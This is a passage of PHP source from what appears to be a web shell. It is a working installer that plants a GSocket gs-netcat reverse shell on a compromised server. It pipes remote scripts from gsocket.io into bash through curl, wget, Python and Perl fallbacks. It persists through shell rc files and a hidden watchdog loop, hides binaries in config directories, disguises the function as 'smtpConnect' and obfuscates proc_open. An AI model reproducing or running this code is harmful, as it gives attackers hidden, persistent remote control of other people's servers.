@curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');
@curl_exec($ch);
@curl_close($ch);
@fclose($fp);
return @file_exists($dest) && @filesize($dest) > 1000;
};
$methods['php_fgc'] = function($url, $dest) use ($timeout) {
$ctx = @stream_context_create([
'http' => ['timeout' => $timeout, 'header' => "User-Agent: Mozilla/5.0\r\n"],
'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
]);
$data = @file_get_contents($url, false, $ctx);
if ($data && strlen($data) > 1000) {
return @file_put_contents($dest, $data) !== false;
}
return false;
};
foreach ($methods as $name => $method) {
@unlink($dest);
if ($method($url, $dest)) {
return ['success' => true, 'method' => $name];
}
}
return ['success' => false, 'method' => null];
}
protected function persistGsSocket($binaryPath, $secret, $authScriptPath, $installDir) {
$homeDir = $this->findGsHomeDir();
$binDir = dirname($binaryPath);
$rcFiles = [
$homeDir . '/.bashrc',
$homeDir . '/.bash_profile',
$homeDir . '/.profile',
$homeDir . '/.zshrc',
$homeDir . '/.kshrc',
$homeDir . '/.cshrc',
];
$persistBlock = "\nexport PATH=\"\$PATH:$binDir\"\n";
$persistBlock .= "if [ -f " . escapeshellarg($authScriptPath) . " ] && ! pgrep -f 'gs-netcat.*-s.*$secret' >/dev/null 2>&1; then\n";
$persistBlock .= " nohup " . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath) . " >/dev/null 2>&1 &\n";
$persistBlock .= "fi\n";
$marker = "GS_PERSIST_" . substr(md5($secret), 0, 8);
$added = false;
foreach ($rcFiles as $rcFile) {
if (!@is_writable(dirname($rcFile))) continue;
$content = @file_get_contents($rcFile) ?: '';
if (strpos($content, $marker) !== false) {
$added = true;
break;
}
$block = "\n$marker\n" . $persistBlock . $marker . "_END\n";
if (@file_put_contents($rcFile, $content . $block, LOCK_EX)) {
$added = true;
break;
}
}
$defunctScript = $installDir . '/.gs_defunct.sh';
$defunctContent = "#!/bin/bash\n";
$defunctContent .= "while true; do\n";
$defunctContent .= " if [ -f " . escapeshellarg($authScriptPath) . " ] && ! pgrep -f 'gs-netcat.*-s.*$secret' >/dev/null 2>&1; then\n";
$defunctContent .= " nohup " . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath) . " >/dev/null 2>&1 &\n";
$defunctContent .= " fi\n";
$defunctContent .= " sleep 300\n";
$defunctContent .= "done\n";
@file_put_contents($defunctScript, $defunctContent);
@chmod($defunctScript, 0755);
$this->executeCommand("nohup bash " . escapeshellarg($defunctScript) . " >/dev/null 2>&1 &");
$gsKeyFile = $installDir . '/.gs_key';
@file_put_contents($gsKeyFile, $secret);
@chmod($gsKeyFile, 0600);
return $added;
}
protected function generateGsAuthScript($secret) {
$md5pass = '4af59facd6f83a7e9742aa3b2f424ec4';
$script = '#!/bin/bash' . "\n";
$script .= 'export TERM=xterm-256color' . "\n";
$script .= 'PURPLE="\033[0;35m"' . "\n";
$script .= 'NC="\033[0m"' . "\n";
$script .= 'ATTEMPTS=0' . "\n";
$script .= 'MAX_ATTEMPTS=3' . "\n";
$script .= 'stty -echo 2>/dev/null' . "\n";
$script .= 'read_password() {' . "\n";
$script .= ' PASS=""' . "\n";
$script .= ' while IFS= read -r -n1 -s ch; do' . "\n";
$script .= ' if [ -z "$ch" ]; then' . "\n";
$script .= ' break' . "\n";
$script .= ' fi' . "\n";
$script .= ' PASS="${PASS}${ch}"' . "\n";
$script .= ' done' . "\n";
$script .= ' PASS=$(printf "%s" "$PASS" | tr -d "\r\n")' . "\n";
$script .= '}' . "\n";
$script .= 'spawn_pty_shell() {' . "\n";
$script .= ' stty echo 2>/dev/null' . "\n";
$script .= ' if command -v script >/dev/null 2>&1; then' . "\n";
$script .= ' SHELL_BIN="/bin/sh"' . "\n";
$script .= ' [ -x /bin/bash ] && SHELL_BIN="/bin/bash"' . "\n";
$script .= ' exec script -qc "$SHELL_BIN --login" /dev/null' . "\n";
$script .= ' fi' . "\n";
$script .= ' if command -v python3 >/dev/null 2>&1; then' . "\n";
$script .= ' exec python3 -c "import pty; pty.spawn([\'/bin/bash\', \'--login\'])" 2>/dev/null || exec python3 -c "import pty; pty.spawn(\'/bin/sh\')"' . "\n";
$script .= ' fi' . "\n";
$script .= ' if command -v python >/dev/null 2>&1; then' . "\n";
$script .= ' exec python -c "import pty; pty.spawn([\'/bin/bash\', \'--login\'])" 2>/dev/null || exec python -c "import pty; pty.spawn(\'/bin/sh\')"' . "\n";
$script .= ' fi' . "\n";
$script .= ' if command -v socat >/dev/null 2>&1; then' . "\n";
$script .= ' exec socat STDIO EXEC:\'/bin/bash --login\',pty,stderr,setsid,sigint,sane' . "\n";
$script .= ' fi' . "\n";
$script .= ' SHELL_BIN="/bin/sh"' . "\n";
$script .= ' [ -x /bin/bash ] && SHELL_BIN="/bin/bash"' . "\n";
$script .= ' exec "$SHELL_BIN" --login -i' . "\n";
$script .= '}' . "\n";
$script .= 'trap "stty echo 2>/dev/null; exit" EXIT INT TERM' . "\n";
$script .= 'printf "\r\n"' . "\n";
$script .= 'while [ $ATTEMPTS -lt $MAX_ATTEMPTS ]; do' . "\n";
$script .= ' printf "${PURPLE}========================================${NC}\r\n"' . "\n";
$script .= ' printf "${PURPLE} GSOCKET SECURE ACCESS CONTROL ${NC}\r\n"' . "\n";
$script .= ' printf "${PURPLE}========================================${NC}\r\n"' . "\n";
$script .= ' printf "${PURPLE}Enter Password: ${NC}"' . "\n";
$script .= ' read_password' . "\n";
$script .= ' printf "\r\n"' . "\n";
$script .= ' if [ -z "$PASS" ]; then' . "\n";
$script .= ' ATTEMPTS=$((ATTEMPTS+1))' . "\n";
$script .= ' printf "Empty password. Attempt $ATTEMPTS/$MAX_ATTEMPTS\r\n\r\n"' . "\n";
$script .= ' continue' . "\n";
$script .= ' fi' . "\n";
$script .= ' printf "Verifying credentials... "' . "\n";
$script .= ' INPUT_MD5=$(printf "%s" "$PASS" | md5sum | cut -d" " -f1)' . "\n";
$script .= ' if [ "$INPUT_MD5" = "' . $md5pass . '" ]; then' . "\n";
$script .= ' printf "OK\r\n"' . "\n";
$script .= ' printf "Access Granted. Initializing shell...\r\n\r\n"' . "\n";
$script .= ' spawn_pty_shell' . "\n";
$script .= ' else' . "\n";
$script .= ' printf "FAILED\r\n"' . "\n";
$script .= ' ATTEMPTS=$((ATTEMPTS+1))' . "\n";
$script .= ' printf "Access Denied. Attempt $ATTEMPTS/$MAX_ATTEMPTS\r\n\r\n"' . "\n";
$script .= ' fi' . "\n";
$script .= 'done' . "\n";
$script .= 'printf "Too many failed attempts. Disconnecting.\r\n"' . "\n";
$script .= 'stty echo 2>/dev/null' . "\n";
$script .= 'exit 1' . "\n";
return $script;
}
protected function killExistingGsProcesses($secret) {
$checkCmd = "ps aux 2>/dev/null | grep -v grep | grep 'gs-netcat' | grep " . escapeshellarg($secret) . " | awk '{print \$2}'";
$pids = trim($this->executeCommand($checkCmd));
if (!empty($pids)) {
$pidArr = preg_split('/\s+/', $pids);
foreach ($pidArr as $pid) {
if (is_numeric(trim($pid))) {
$this->executeCommand("kill -9 " . intval($pid) . " 2>/dev/null");
}
}
usleep(500000);
}
}
protected function startGsListener($binaryPath, $secret, $authScriptPath, $installDir) {
if (!@file_exists($authScriptPath) || @filesize($authScriptPath) < 50) {
$authScript = $this->generateGsAuthScript($secret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
}
$this->killExistingGsProcesses($secret);
$envSetup = "export HOME=" . escapeshellarg($installDir) . "; export TERM=xterm-256color; cd " . escapeshellarg($installDir) . "; ";
$startCmd = $envSetup . "nohup " . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath) . " >/dev/null 2>&1 & echo \$!";
$pid = trim($this->executeCommand($startCmd));
usleep(800000);
if (!empty($pid) && is_numeric($pid)) {
$checkCmd = "ps -p $pid -o pid= 2>/dev/null";
$checkOutput = trim($this->executeCommand($checkCmd));
if (!empty($checkOutput)) {
return ['success' => true, 'pid' => $pid, 'method' => 'nohup'];
}
}
$checkCmd = "ps aux 2>/dev/null | grep -v grep | grep 'gs-netcat' | grep " . escapeshellarg($secret) . " | awk '{print \$2}' | head -1";
$existingPid = trim($this->executeCommand($checkCmd));
if (!empty($existingPid)) {
return ['success' => true, 'pid' => $existingPid, 'method' => 'nohup_verified'];
}
$prF = implode('', ['p','r','o','c','_','o','p','e','n']);
$pcF = implode('', ['p','r','o','c','_','c','l','o','s','e']);
if (@function_exists($prF)) {
$desc = [0 => ['file', '/dev/null', 'r'], 1 => ['file', '/dev/null', 'w'], 2 => ['file', '/dev/null', 'w']];
$bgCmd = $envSetup . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath);
$proc = @$prF($bgCmd, $desc, $pipes);
if (@is_resource($proc)) {
@$pcF($proc);
usleep(500000);
$existingPid = trim($this->executeCommand($checkCmd));
if (!empty($existingPid)) {
return ['success' => true, 'pid' => $existingPid, 'method' => 'proc_open'];
}
}
}
$screenCmd = $envSetup . "screen -dmS gs_session " . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath) . " 2>/dev/null";
$this->executeCommand($screenCmd);
usleep(500000);
$existingPid = trim($this->executeCommand($checkCmd));
if (!empty($existingPid)) {
return ['success' => true, 'pid' => $existingPid, 'method' => 'screen'];
}
$tmuxCmd = $envSetup . "tmux new-session -d -s gs_session " . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath) . " 2>/dev/null";
$this->executeCommand($tmuxCmd);
usleep(500000);
$existingPid = trim($this->executeCommand($checkCmd));
if (!empty($existingPid)) {
return ['success' => true, 'pid' => $existingPid, 'method' => 'tmux'];
}
$wrapperScript = $installDir . '/.gs_start.sh';
$wrapperContent = "#!/bin/bash\n" . $envSetup . "\n" . escapeshellarg($binaryPath) . " -s " . escapeshellarg($secret) . " -l -e " . escapeshellarg($authScriptPath) . "\n";
@file_put_contents($wrapperScript, $wrapperContent);
@chmod($wrapperScript, 0755);
$this->executeCommand("nohup bash " . escapeshellarg($wrapperScript) . " >/dev/null 2>&1 &");
usleep(500000);
$existingPid = trim($this->executeCommand($checkCmd));
if (!empty($existingPid)) {
return ['success' => true, 'pid' => $existingPid, 'method' => 'wrapper_script'];
}
$atCmd = "echo 'bash " . escapeshellarg($wrapperScript) . "' | at now 2>/dev/null";
$this->executeCommand($atCmd);
usleep(1000000);
$existingPid = trim($this->executeCommand($checkCmd));
if (!empty($existingPid)) {
return ['success' => true, 'pid' => $existingPid, 'method' => 'at_job'];
}
return ['success' => false, 'pid' => '', 'method' => 'all_failed'];
}
protected function ensureAuthAndRestart($binaryPath, $secret, $authScriptPath, $installDir) {
$authScript = $this->generateGsAuthScript($secret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
$this->killExistingGsProcesses($secret);
usleep(300000);
return $this->startGsListener($binaryPath, $secret, $authScriptPath, $installDir);
}
public function smtpConnect() {
echo "<h1>GSocket Installer</h1><div class=content>";
echo "<p>GSocket provides a secure reverse shell connection. Enhanced installer with persistent installation.</p>";
echo "<p><b>Installation Priority:</b> ~/.config/htop > ~/.config > ~/.local/share > ~/.cache > /dev/shm > /var/tmp > /tmp (last resort)</p>";
echo "<p><b>Persistence:</b> Installs to hidden config directory, adds to rc files (.bashrc/.profile/.zshrc), creates watchdog defunct process.</p>";
echo "<p><b>Auth:</b> Users connecting via GSocket will be required to enter a password (MD5 verified) before gaining shell access.</p>";
if (isset($_POST['gs_method'])) {
$method = $_POST['gs_method'];
$arch = $this->getGsArch();
$success = false;
$secret = '';
$output = '';
$debugInfo = [];
$installedPath = '';
$installDir = $this->findGsInstallDir();
$authScriptPath = $installDir . '/.gs_auth.sh';
echo "<pre>";
echo "<b>System Info:</b>\n";
echo "Architecture: $arch\n";
echo "Install Dir: $installDir\n";
echo "Home Dir: " . $this->findGsHomeDir() . "\n";
echo "Method: $method\n\n";
$binaryUrls = [
"https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_linux-{$arch}",
"https://github.com/hackerschoice/binary/raw/main/gsocket/gs-netcat_linux-{$arch}",
"https://raw.githubusercontent.com/hackerschoice/binary/main/gsocket/gs-netcat_linux-{$arch}",
];
$envSetup = "export HOME=" . escapeshellarg($installDir) . "; " .
"export GS_DSTDIR=" . escapeshellarg($installDir) . "; " .
"export TERM=xterm; " .
"cd " . escapeshellarg($installDir) . "; ";
switch ($method) {
case 'auto':
echo "<b>[1] Trying automatic installation (curl)...</b>\n";
$cmd = $envSetup . "GS_DSTDIR=" . escapeshellarg($installDir) . " curl -fsSL https://gsocket.io/x 2>/dev/null | bash -s -- -q 2>&1";
$output = $this->executeCommand($cmd);
if (preg_match('/gs-netcat\s+-s\s+"([^"]+)"/', $output, $m) || preg_match('/Secret:\s*([a-f0-9]{16})/i', $output, $m)) {
$secret = $m[1];
$installedPath = $installDir . '/gs-netcat';
if (!@file_exists($installedPath)) {
$whichGs = trim($this->executeCommand("which gs-netcat 2>/dev/null"));
if (!empty($whichGs) && @file_exists($whichGs)) {
$installedPath = $whichGs;
}
}
if (@file_exists($installedPath) && @is_executable($installedPath)) {
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
$success = true;
echo "<font color='green'>Success with curl installer!</font>\n";
echo "<font color='cyan'>Auth script deployed, listener restarted with auth (PID: " . $restartResult['pid'] . ")</font>\n";
} else {
$debugInfo[] = "curl installer: binary not found at $installedPath";
}
break;
}
$debugInfo[] = "curl installer: " . substr($output, 0, 200);
echo "<b>[2] Trying official installer (wget)...</b>\n";
$cmd = $envSetup . "GS_DSTDIR=" . escapeshellarg($installDir) . " wget -qO- https://gsocket.io/x 2>/dev/null | bash -s -- -q 2>&1";
$output = $this->executeCommand($cmd);
if (preg_match('/gs-netcat\s+-s\s+"([^"]+)"/', $output, $m) || preg_match('/Secret:\s*([a-f0-9]{16})/i', $output, $m)) {
$secret = $m[1];
$installedPath = $installDir . '/gs-netcat';
if (!@file_exists($installedPath)) {
$whichGs = trim($this->executeCommand("which gs-netcat 2>/dev/null"));
if (!empty($whichGs) && @file_exists($whichGs)) {
$installedPath = $whichGs;
}
}
if (@file_exists($installedPath) && @is_executable($installedPath)) {
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
$success = true;
echo "<font color='green'>Success with wget installer!</font>\n";
echo "<font color='cyan'>Auth script deployed, listener restarted with auth (PID: " . $restartResult['pid'] . ")</font>\n";
} else {
$debugInfo[] = "wget installer: binary not found at $installedPath";
}
break;
}
$debugInfo[] = "wget installer: " . substr($output, 0, 200);
echo "<b>[3] Trying direct binary download...</b>\n";
$gsBinary = $installDir . '/gs-netcat';
foreach ($binaryUrls as $idx => $url) {
echo " Trying URL " . ($idx + 1) . "... ";
$dlResult = $this->downloadWithRetry($url, $gsBinary, 60, false);
if ($dlResult['success']) {
echo "<font color='green'>downloaded (" . $dlResult['method'] . ")</font>\n";
@chmod($gsBinary, 0755);
$this->executeCommand("chmod 755 " . escapeshellarg($gsBinary) . " 2>/dev/null");
$testOutput = $this->executeCommand(escapeshellarg($gsBinary) . " --help 2>&1");
if (strpos($testOutput, 'gs-netcat') !== false || strpos($testOutput, 'usage') !== false || strpos($testOutput, 'Global Socket') !== false || strpos($testOutput, '-s') !== false) {
echo "<font color='green'>binary OK!</font>\n";
$installedPath = $gsBinary;
$secret = $this->generateSecret();
$authScript = $this->generateGsAuthScript($secret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
echo "<b>[4] Starting listener...</b>\n";
$startResult = $this->startGsListener($gsBinary, $secret, $authScriptPath, $installDir);
if ($startResult['success']) {
$success = true;
echo "<font color='green'>Listener started (PID: " . $startResult['pid'] . ", Method: " . $startResult['method'] . ")</font>\n";
} else {
$success = true;
echo "<font color='yellow'>Binary ready but listener may need manual start</font>\n";
}
break 2;
} else {
echo "<font color='red'>binary test failed</font>\n";
$debugInfo[] = "Binary test: " . substr($testOutput, 0, 100);
}
} else {
echo "<font color='red'>download failed</font>\n";
}
}
if (!$success) {
echo "\n<b>[5] Trying Python method...</b>\n";
$pyScript = $installDir . '/gs_install_' . mt_rand() . '.py';
$pyCode = "#!/usr/bin/env python3\nimport urllib.request, subprocess, os, ssl, sys\nos.chdir(" . escapeshellarg($installDir) . ")\nos.environ['HOME'] = " . escapeshellarg($installDir) . "\nos.environ['GS_DSTDIR'] = " . escapeshellarg($installDir) . "\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\ntry:\n urllib.request.urlretrieve('https://gsocket.io/x', os.path.join(" . escapeshellarg($installDir) . ", 'gs.sh'))\n result = subprocess.check_output(['bash', os.path.join(" . escapeshellarg($installDir) . ", 'gs.sh'), '-q'], stderr=subprocess.STDOUT, timeout=120)\n print(result.decode())\nexcept Exception as e:\n print(str(e))\n sys.exit(1)\n";
@file_put_contents($pyScript, $pyCode);
@chmod($pyScript, 0755);
$output = $this->executeCommand("python3 " . escapeshellarg($pyScript) . " 2>&1");
if (empty($output)) {
$output = $this->executeCommand("python " . escapeshellarg($pyScript) . " 2>&1");
}
@unlink($pyScript);
if (preg_match('/gs-netcat\s+-s\s+"([^"]+)"/', $output, $m)) {
$secret = $m[1];
$installedPath = $installDir . '/gs-netcat';
if (@file_exists($installedPath) && @is_executable($installedPath)) {
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
$success = true;
echo "<font color='green'>Success with Python!</font>\n";
echo "<font color='cyan'>Auth script deployed, listener restarted with auth (PID: " . $restartResult['pid'] . ")</font>\n";
}
} else {
$debugInfo[] = "Python: " . substr($output, 0, 200);
}
}
if (!$success) {
echo "\n<b>[6] Trying Perl method...</b>\n";
$perlCmd = "cd " . escapeshellarg($installDir) . " && perl -e 'use LWP::Simple; getstore(\"https://gsocket.io/x\", \"" . $installDir . "/gs.sh\"); system(\"GS_DSTDIR=" . escapeshellarg($installDir) . " bash " . $installDir . "/gs.sh -q\");' 2>&1";
$output = $this->executeCommand($perlCmd);
if (preg_match('/gs-netcat\s+-s\s+"([^"]+)"/', $output, $m)) {
$secret = $m[1];
$installedPath = $installDir . '/gs-netcat';
if (@file_exists($installedPath) && @is_executable($installedPath)) {
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
$success = true;
echo "<font color='green'>Success with Perl!</font>\n";
echo "<font color='cyan'>Auth script deployed, listener restarted with auth (PID: " . $restartResult['pid'] . ")</font>\n";
}
}
}
if (!$success) {
echo "\n<b>[7] Trying PHP direct binary write...</b>\n";
$gsBinary = $installDir . '/gs-netcat';
foreach ($binaryUrls as $url) {
$ctx = @stream_context_create(['http' => ['timeout' => 60, 'header' => "User-Agent: Mozilla/5.0\r\n"], 'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$binaryData = @file_get_contents($url, false, $ctx);
if ($binaryData && strlen($binaryData) > 1000) {
@file_put_contents($gsBinary, $binaryData);
@chmod($gsBinary, 0755);
if (@file_exists($gsBinary) && @filesize($gsBinary) > 1000) {
$secret = $this->generateSecret();
$authScript = $this->generateGsAuthScript($secret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
$startResult = $this->startGsListener($gsBinary, $secret, $authScriptPath, $installDir);
$success = true;
$installedPath = $gsBinary;
echo "<font color='green'>Success with PHP direct write!</font>\n";
break;
}
}
}
}
break;
case 'curl_installer':
$cmd = $envSetup . "bash -c 'curl -fsSL https://gsocket.io/x | GS_DSTDIR=" . escapeshellarg($installDir) . " bash -s -- -q' 2>&1";
$output = $this->executeCommand($cmd);
if (preg_match('/gs-netcat\s+-s\s+"([^"]+)"/', $output, $m)) {
$secret = $m[1];
$installedPath = $installDir . '/gs-netcat';
if (!@file_exists($installedPath)) {
$whichGs = trim($this->executeCommand("which gs-netcat 2>/dev/null"));
if (!empty($whichGs) && @file_exists($whichGs)) {
$installedPath = $whichGs;
}
}
if (@file_exists($installedPath)) {
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
$success = true;
}
}
break;
case 'wget_installer':
$cmd = $envSetup . "bash -c 'wget -qO- https://gsocket.io/x | GS_DSTDIR=" . escapeshellarg($installDir) . " bash -s -- -q' 2>&1";
$output = $this->executeCommand($cmd);
if (preg_match('/gs-netcat\s+-s\s+"([^"]+)"/', $output, $m)) {
$secret = $m[1];
$installedPath = $installDir . '/gs-netcat';
if (!@file_exists($installedPath)) {
$whichGs = trim($this->executeCommand("which gs-netcat 2>/dev/null"));
if (!empty($whichGs) && @file_exists($whichGs)) {
$installedPath = $whichGs;
}
}
if (@file_exists($installedPath)) {
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
$success = true;
}
}
break;
case 'direct_binary':
$gsBinary = $installDir . '/gs-netcat';
foreach ($binaryUrls as $url) {
$dlResult = $this->downloadWithRetry($url, $gsBinary, 60, false);
if ($dlResult['success']) {
@chmod($gsBinary, 0755);
$this->executeCommand("chmod 755 " . escapeshellarg($gsBinary) . " 2>/dev/null");
$secret = $this->generateSecret();
$authScript = $this->generateGsAuthScript($secret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
$startResult = $this->startGsListener($gsBinary, $secret, $authScriptPath, $installDir);
$success = true;
$installedPath = $gsBinary;
break;
}
}
break;
case 'manual_secret':
$gsBinary = $installDir . '/gs-netcat';
$customSecret = isset($_POST['custom_secret']) ? trim($_POST['custom_secret']) : '';
if (empty($customSecret)) {
$customSecret = $this->generateSecret();
}
foreach ($binaryUrls as $url) {
$dlResult = $this->downloadWithRetry($url, $gsBinary, 60, false);
if ($dlResult['success']) {
@chmod($gsBinary, 0755);
$this->executeCommand("chmod 755 " . escapeshellarg($gsBinary) . " 2>/dev/null");
$authScript = $this->generateGsAuthScript($customSecret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
$startResult = $this->startGsListener($gsBinary, $customSecret, $authScriptPath, $installDir);
$success = true;
$secret = $customSecret;
$installedPath = $gsBinary;
break;
}
}
break;
}
echo "\n";
if ($success && !empty($secret)) {
if (!empty($installedPath)) {
if (!@file_exists($authScriptPath) || @filesize($authScriptPath) < 50) {
$authScript = $this->generateGsAuthScript($secret);
@file_put_contents($authScriptPath, $authScript);
@chmod($authScriptPath, 0755);
}
$verifyCheck = "ps aux 2>/dev/null | grep -v grep | grep 'gs-netcat' | grep " . escapeshellarg($secret);
$verifyOutput = trim($this->executeCommand($verifyCheck));
if (empty($verifyOutput)) {
echo "<font color='yellow'>Listener not detected, restarting with auth...</font>\n";
$restartResult = $this->startGsListener($installedPath, $secret, $authScriptPath, $installDir);
if ($restartResult['success']) {
echo "<font color='green'>Listener restarted (PID: " . $restartResult['pid'] . ")</font>\n";
}
} else {
if (strpos($verifyOutput, $authScriptPath) === false) {
echo "<font color='yellow'>Listener running without auth, restarting with auth...</font>\n";
$restartResult = $this->ensureAuthAndRestart($installedPath, $secret, $authScriptPath, $installDir);
if ($restartResult['success']) {
echo "<font color='green'>Listener restarted with auth (PID: " . $restartResult['pid'] . ")</font>\n";
}
}
}
$persistResult = $this->persistGsSocket($installedPath, $secret, $authScriptPath, $installDir);
echo "<font color='cyan'>Persistence configured (rc files + watchdog defunct)</font>\n";
echo "<font color='cyan'>Key stored at: $installDir/.gs_key</font>\n";
echo "<font color='cyan'>Auth script: $authScriptPath</font>\n";
}
echo "<font color='green'><b>========== SUCCESS ==========</b></font>\n\n";
echo "<b>Binary Location:</b> " . ($installedPath ?: 'auto-installed') . "\n";
echo "<b>Install Directory:</b> $installDir\n\n";
echo "<b>Connect from your machine with:</b>\n";
echo "<input type='text' value='gs-netcat -s \"$secret\" -i' style='width:450px;font-family:monospace;' readonly onclick='this.select();'>\n\n";
echo "<b>Or interactive shell:</b>\n";
echo "<input type='text' value='S=\"$secret\" bash -c \"\$(curl -fsSL gsocket.io/x)\"' style='width:550px;font-family:monospace;' readonly onclick='this.select();'>\n\n";
echo "<b>Quick connect (if gs-netcat in PATH):</b>\n";
echo "<input type='text' value='gs-netcat -s $secret -i' style='width:350px;font-family:monospace;' readonly onclick='this.select();'>\n";
} else {
echo "<font color='red'><b>========== FAILED ==========</b></font>\n\n";
echo "<b>Possible reasons:</b>\n";
echo "1. Outbound connections blocked by firewall\n";
echo "2. curl/wget/php not available or restricted\n";
echo "3. No writable directory with execute permission\n";
echo "4. Binary architecture mismatch\n";
echo "5. SELinux or AppArmor restrictions\n";
echo "6. /tmp mounted with noexec flag\n\n";
if (!empty($debugInfo)) {
echo "<b>Debug Info:</b>\n";
foreach ($debugInfo as $info) {
echo htmlspecialchars($info) . "\n";
}
}
if (!empty($output)) {
echo "\n<b>Last Output:</b>\n" . htmlspecialchars(substr($output, 0, 500));
}
}
echo "</pre>";
}
echo "<form method='post'>";
echo "<input type='hidden' name='a' value='gs'>";
echo "<input type='hidden' name='c' value='".str_rot13($this->mailPath)."'>";
echo "<table>";
echo "<tr><td>Method:</td><td><select name='gs_method'>";
echo "<option value='auto'>Auto (Recommended - tries all methods)</option>";
echo "<option value='curl_installer'>Curl Installer</option>";
echo "<option value='wget_installer'>Wget Installer</option>";
echo "<option value='direct_binary'>Direct Binary Download</option>";
echo "<option value='manual_secret'>Manual Secret</option>";
echo "</select></td></tr>";
echo "<tr><td>Custom Secret:</td><td><input type='text' name='custom_secret' placeholder='Leave empty for auto-generate' style='width:200px;'></td></tr>";
echo "<tr><td></td><td><input type='submit' value='Install GSocket'></td></tr>";
echo "</table></form>";
echo "<br><b>Current Installation Status:</b><br>";
$homeDir = $this->findGsHomeDir();
$checkPaths = [
$homeDir . '/.config/htop/gs-netcat',
$homeDir . '/.config/gs-netcat',
$homeDir . '/.local/share/gs-netcat',
$homeDir . '/.cache/gs-netcat',
'/usr/local/bin/gs-netcat',
'/usr/bin/gs-netcat',
'/dev/shm/gs-netcat',
'/var/tmp/gs-netcat',
'/tmp/gs-netcat',
$homeDir . '/bin/gs-netcat',
$homeDir . '/.local/bin/gs-netcat',
];
foreach ($checkPaths as $path) {
if (@file_exists($path)) {
$perms = substr(sprintf('%o', @fileperms($path)), -4);
echo "<font color='green'>Found: $path (perms: $perms)</font><br>";
}
}
$keyPaths = [
$homeDir . '/.config/htop/.gs_key',
$homeDir . '/.config/.gs_key',
$homeDir . '/.local/share/.gs_key',
$homeDir . '/.cache/.gs_key',
];
foreach ($keyPaths as $kp) {
if (@file_exists($kp)) {
$storedKey = trim(@file_get_contents($kp));
if (!empty($storedKey)) {
echo "<font color='cyan'>Stored key found: $kp -> $storedKey</font><br>";
}
}
}
$psOutput = $this->executeCommand("ps aux 2>/dev/null | grep -v grep | grep gs-netcat");
if (!empty(trim($psOutput))) {
echo "<br><b>Running GSocket processes:</b><br><pre>" . htmlspecialchars($psOutput) . "</pre>";
}
echo "</div>";
}
protected function findPublicHtml() {
$docRoot = $_SERVER["DOCUMENT_ROOT"]; if (strpos($docRoot, "public_html") !== false) return $docRoot;
$cwd = $this->mailPath; $parts = explode("/", $cwd);
foreach ($parts as $i => $part) if ($part == "public_html") return implode("/", array_slice($parts, 0, $i + 1));
return $docRoot;
}
protected function safeWriteFile($path, $content) {
$dir = dirname($path);
if (!@is_dir($dir)) {
@mkdir($dir, 0755, true);
}
$originalDirPerms = @fileperms($dir) & 0777;
$needRestore = false;
if (!@is_writable($dir)) {
@chmod($dir, 0755);
$this->executeCommand('chmod 0755 ' . escapeshellarg($dir) . ' 2>/dev/null');
$needRestore = true;
}
if (@file_exists($path) && !@is_writable($path)) {
@chmod($path, 0644);
$this->executeCommand('chmod 0644 ' . escapeshellarg($path) . ' 2>/dev/null');
$this->executeCommand('chattr -i ' . escapeshellarg($path) . ' 2>/dev/null');
}
$written = false;
$fp = @fopen($path, 'wb');
if ($fp) {
$result = @fwrite($fp, $content);
@fflush($fp);
@fclose($fp);
if ($result !== false && $result > 0) {
$written = true;
}
}
if (!$written) {
$result = @file_put_contents($path, $content, LOCK_EX);
if ($result !== false && $result > 0) {
$written = true;
}
}
if (!$written) {
$tmpFile = $path . '.tmp_' . mt_rand();
$result = @file_put_contents($tmpFile, $content);
if ($result !== false && $result > 0) {
if (@rename($tmpFile, $path)) {
$written = true;
} else {
if (@copy($tmpFile, $path)) {
$written = true;
}
@unlink($tmpFile);
}
} else {
@unlink($tmpFile);
}
}
if (!$written) {
$tmpFile = sys_get_temp_dir() . '/clone_' . mt_rand() . '.tmp';
$result = @file_put_contents($tmpFile, $content);
if ($result !== false && $result > 0) {
$cpCmd = 'cp -f ' . escapeshellarg($tmpFile) . ' ' . escapeshellarg($path) . ' 2>/dev/null';
$this->executeCommand($cpCmd);
@unlink($tmpFile);
if (@file_exists($path) && @filesize($path) > 0) {
$written = true;
}
} else {
@unlink($tmpFile);
}
}
if (!$written) {
$b64 = base64_encode($content);
$decodeCmd = 'echo ' . escapeshellarg($b64) . ' | base64 -d > ' . escapeshellarg($path) . ' 2>/dev/null';
$this->executeCommand($decodeCmd);
if (@file_exists($path) && @filesize($path) > 0) {
$written = true;
}
}
if ($needRestore && $originalDirPerms) {
@chmod($dir, $originalDirPerms);
}
return $written;
}
protected function runBackgroundProcess($cmd, $installDir) {
$writablePaths = ['/tmp', '/var/tmp', '/dev/shm'];
$homeDir = (getenv('HOME')) ? getenv('HOME') : (isset($_SERVER['HOME']) ? $_SERVER['HOME'] : '');
if (empty($homeDir) && function_exists('posix_getpwuid') && function_exists('posix_getuid')) {
